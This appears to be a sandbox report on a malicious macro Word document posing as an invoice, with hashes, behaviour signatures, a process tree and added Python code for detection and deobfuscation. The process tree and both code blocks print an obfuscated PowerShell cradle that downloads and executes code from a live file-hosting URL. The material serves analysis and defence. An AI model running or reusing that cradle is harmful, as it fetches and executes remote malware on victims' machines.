Analysis

  • max time kernel
    239s
  • max time network
    243s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    10-06-2022 14:00

General

  • Target

    INVOICE PACKAGE LINK TO DOWNLOAD.docm

  • Size

    16KB

  • MD5

    f2d0c66b801244c059f636d08a474079

  • SHA1

    c62129fff128817b5af62aa0051c082f9992112e

  • SHA256

    08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873

  • SHA512

    5283b2c228d6bdfe5d942f0a318ecd7e251e8a78d1451dc825f05e35d5e07a362e04c8777f63761b13bc672e76391cdc11be5e86ae4a260715e3e5a5cd2f305d

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://filetransfer.io/data-package/UR2whuBv/download

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
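Detection logic for the first two signatures above (an Office process spawning a script host, and a download cradle on an obfuscated powershell.exe command line), as an added example that is not part of the sandbox report. The events are constructed dictionaries whose field names follow Sysmon Event ID 1; only the first mirrors the report's WINWORD.EXE -> powershell.exe pair, and the rule names, regexes and threshold are the example's own.

```python
"""Flag Office-spawned script hosts and obfuscated PowerShell download cradles.

Added example, not part of the sandbox report. EVENTS are constructed
dictionaries whose field names follow Sysmon Event ID 1 (ProcessCreate);
only the first mirrors the report's WINWORD.EXE -> powershell.exe pair.
"""
import re
from typing import Dict, List, Tuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

# Download-cradle tokens. String concatenation ('D'+'o'+...) hides most of
# them on the report's command line, so the obfuscation score is a separate rule.
CRADLE_RE = re.compile(
    r"\biex\b|invoke-expression|downloadstring|downloadfile|webclient|invoke-webrequest|\biwr\b",
    re.I,
)
BACKTICK_RE = re.compile(r"(?<=[A-Za-z])`(?=[A-Za-z-])")   # I`EX, n`e`W`-Obj`E`c`T
SHORT_CONCAT_RE = re.compile(r"'[^']{0,3}'(?=\s*\+)")       # 'D'+'o'+'w'+ ...
STRING_METHOD_RE = re.compile(r"\.\(\s*\(?\s*'")            # .(('Downl'+'oadString')).Invoke(
OBFUSCATION_THRESHOLD = 10   # example's own value; tune against your own baseline

# The report's command line (PIDs 1504 and 5112); the run of ''+ terms is shortened.
REPORT_CMDLINE = (
    "powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'"
    "+'l'+'o'+'a'+'d'+'s'+'tri'+" + "''+" * 20 + "'n'+'g')).InVokE((('https://filetransfer.io/"
    "data-package/UR2whuBv/download'))))"
)

EVENTS = [
    {   # mirrors the report: WINWORD.EXE (2512) -> powershell.exe (1504)
        "ProcessId": "1504", "ParentProcessId": "2512",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
        "CommandLine": REPORT_CMDLINE,
    },
    {   # constructed: an admin running PowerShell from Explorer
        "ProcessId": "7000", "ParentProcessId": "6000",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell.exe -NoProfile -Command "Get-Process | Where-Object { $_.CPU -gt 100 }"',
    },
    {   # constructed: Word's print helper, a legitimate Office child
        "ProcessId": "7001", "ParentProcessId": "2512",
        "Image": r"C:\Windows\splwow64.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
        "CommandLine": r"C:\Windows\splwow64.exe 12288",
    },
    {   # constructed: unobfuscated cradle from cmd.exe, no Office parent
        "ProcessId": "7002", "ParentProcessId": "6500",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
    },
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def obfuscation_score(cmdline: str) -> int:
    """Count the string-obfuscation tricks typical of macro-dropped PowerShell."""
    score = len(BACKTICK_RE.findall(cmdline))      # backtick-split bare words
    score += len(SHORT_CONCAT_RE.findall(cmdline))  # strings built from tiny literals
    if STRING_METHOD_RE.search(cmdline):            # method name supplied as a string
        score += 5
    return score


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (empty list when benign)."""
    hits: List[str] = []
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    if image in {"powershell.exe", "pwsh.exe"}:
        # Backticks are stripped so I`EX still matches; concatenated strings are not
        # reassembled here, which is what the score catches.
        if CRADLE_RE.search(cmd.replace("`", "")):
            hits.append("powershell_download_cradle")
        if obfuscation_score(cmd) >= OBFUSCATION_THRESHOLD:
            hits.append("powershell_obfuscated_cmdline")
    return hits


def run_detection(events) -> List[Tuple[str, List[str]]]:
    """(ProcessId, hits) for every event that matched at least one rule."""
    flagged = []
    for event in events:
        hits = evaluate(event)
        if hits:
            flagged.append((event["ProcessId"], hits))
    return flagged


if __name__ == "__main__":
    for pid, hits in run_detection(EVENTS):
        print(pid, ", ".join(hits))
```

The parent/child rule alone already fires on the report's pair; the command-line rules are there so the same cradle launched from a non-Office parent (last event) is still caught, and so a legitimate Office child such as the print helper stays quiet.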

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\INVOICE PACKAGE LINK TO DOWNLOAD.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2512
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1504
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5112
  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1532
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      2⤵
      • Checks processor information in registry
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4248
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4248.0.1282594299\2012578561" -parentBuildID 20200403170909 -prefsHandle 1684 -prefMapHandle 1600 -prefsLen 1 -prefMapSize 219989 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4248 "\\.\pipe\gecko-crash-server-pipe.4248" 1764 gpu
        3⤵
        PID:4776
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4248.3.1318757906\1276019456" -childID 1 -isForBrowser -prefsHandle 2380 -prefMapHandle 1480 -prefsLen 112 -prefMapSize 219989 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4248 "\\.\pipe\gecko-crash-server-pipe.4248" 2328 tab
        3⤵
        PID:4376
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4248.13.2093681315\2130023771" -childID 2 -isForBrowser -prefsHandle 3692 -prefMapHandle 3688 -prefsLen 6894 -prefMapSize 219989 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4248 "\\.\pipe\gecko-crash-server-pipe.4248" 3712 tab
        3⤵
        PID:2296
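Deobfuscating the powershell.exe command line from the process tree above (PIDs 1504 and 5112) to recover the URL listed under Malware Config, as an added example that is not part of the sandbox report. The long run of empty-string terms in the command line is shortened in the constant; the regexes, the step order and the `CANONICAL` spelling list are the example's own choices, not anything the report's analysis engine documents.

```python
"""Recover the dropper URL from the obfuscated PowerShell command line.

Added example, not part of the sandbox report. It undoes the three tricks
visible in the report's command line (backtick-split bare words, strings built
from tiny concatenated literals, a method name supplied as a string and called
through .Invoke()) and then pulls URLs out of the result.
"""
import re
from typing import List, Pattern

# The report's command line (PIDs 1504 and 5112); the run of ''+ terms is shortened.
SAMPLE_CMDLINE = (
    "powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'"
    "+'l'+'o'+'a'+'d'+'s'+'tri'+" + "''+" * 20 + "'n'+'g')).InVokE((('https://filetransfer.io/"
    "data-package/UR2whuBv/download'))))"
)

CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")          # 'D'+'o' -> 'Do'
LITERAL_PARENS_RE = re.compile(r"(?<!\w)\(\s*('[^']*')\s*\)")   # (('x')) -> 'x', f('x') kept
STRING_INVOKE_RE = re.compile(r"\.'([A-Za-z_]\w*)'\.invoke\(", re.I)  # .'Foo'.Invoke( -> .Foo(
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)

# Canonical spelling for the names the cradle uses; cosmetic, applied last.
CANONICAL = ["IEX", "Invoke-Expression", "New-Object", "Net.WebClient",
             "DownloadString", "DownloadFile"]


def strip_backticks(s: str) -> str:
    """Drop backticks outside single-quoted strings (I`EX -> IEX).

    Inside single quotes a backtick is a literal character, so those are kept.
    A doubled quote ('') as an escaped quote inside a string is not handled;
    the sample contains none.
    """
    parts = re.findall(r"'[^']*'|[^']+|'", s)
    return "".join(p if p.startswith("'") else p.replace("`", "") for p in parts)


def _fixpoint(pattern: Pattern, repl: str, s: str) -> str:
    """Apply a substitution until the text stops changing."""
    while True:
        new = pattern.sub(repl, s)
        if new == s:
            return s
        s = new


def deobfuscate(cmdline: str) -> str:
    s = strip_backticks(cmdline)
    s = _fixpoint(CONCAT_RE, r"'\g<1>\g<2>'", s)   # reassemble concatenated literals
    s = _fixpoint(LITERAL_PARENS_RE, r"\g<1>", s)  # peel parentheses wrapping a lone literal
    s = STRING_INVOKE_RE.sub(r".\g<1>(", s)         # turn string-named member calls into direct calls
    for name in CANONICAL:
        s = re.sub(r"\b" + re.escape(name) + r"\b", name, s, flags=re.I)
    return s


def extract_urls(text: str) -> List[str]:
    """Unique URLs in order of first appearance."""
    seen, urls = set(), []
    for url in URL_RE.findall(text):
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


if __name__ == "__main__":
    cleaned = deobfuscate(SAMPLE_CMDLINE)
    print(cleaned)
    print(extract_urls(cleaned))
```

The parenthesis step uses a negative lookbehind so that `DownloadString('...')` keeps its call parentheses while `(('...'))` around a bare literal is peeled; running each substitution to a fixed point is what handles nesting of arbitrary depth and concatenation chains of any length.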

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Discovery
    • Query Registry T1012 (2 signatures)
    • System Information Discovery T1082 (2 signatures)
  • Command and Control
    • Web Service T1102 (1 signature)


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    abc27673d9c940ad74b41c58391d2412

    SHA1

    9a31a521a521dcd0f974ce6f7a50aecc69a50df0

    SHA256

    cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357

    SHA512

    c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

  • memory/1504-138-0x000002AA5FBE0000-0x000002AA5FC02000-memory.dmp
    Filesize

    136KB

  • memory/1504-137-0x0000000000000000-mapping.dmp
  • memory/1504-140-0x00007FFE4BAE0000-0x00007FFE4C5A1000-memory.dmp
    Filesize

    10.8MB

  • memory/1504-139-0x00007FFE4BAE0000-0x00007FFE4C5A1000-memory.dmp
    Filesize

    10.8MB

  • memory/2512-136-0x00007FFE35080000-0x00007FFE35090000-memory.dmp
    Filesize

    64KB

  • memory/2512-133-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
    Filesize

    64KB

  • memory/2512-130-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
    Filesize

    64KB

  • memory/2512-135-0x00007FFE35080000-0x00007FFE35090000-memory.dmp
    Filesize

    64KB

  • memory/2512-134-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
    Filesize

    64KB

  • memory/2512-132-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
    Filesize

    64KB

  • memory/2512-131-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
    Filesize

    64KB

  • memory/5112-141-0x0000000000000000-mapping.dmp
  • memory/5112-144-0x00007FFE4A430000-0x00007FFE4AEF1000-memory.dmp
    Filesize

    10.8MB

  • memory/5112-145-0x00007FFE4A430000-0x00007FFE4AEF1000-memory.dmp
    Filesize

    10.8MB